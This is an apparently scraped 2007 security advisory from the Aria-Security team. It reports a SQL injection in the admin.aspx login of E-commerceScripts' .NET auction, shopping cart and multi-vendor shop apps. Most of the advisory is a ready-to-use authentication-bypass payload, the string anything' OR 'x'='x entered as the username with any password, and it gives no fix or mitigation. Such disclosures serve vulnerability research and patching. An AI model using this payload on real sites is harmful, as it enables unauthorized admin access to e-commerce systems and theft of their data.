Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17645
HistoryJul 31, 2007 - 12:00 a.m.

E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL

2007-07-3100:00:00
vulners.com
25

A R I A - S E C U R I T Y


Vendor: http://www.e-commercescripts.com/dotnet/
E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL

Injection

Username: anything' OR 'x'='x
password: whatever you want ( or anything' OR 'x'='x)

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info [PERSONAL BLOG]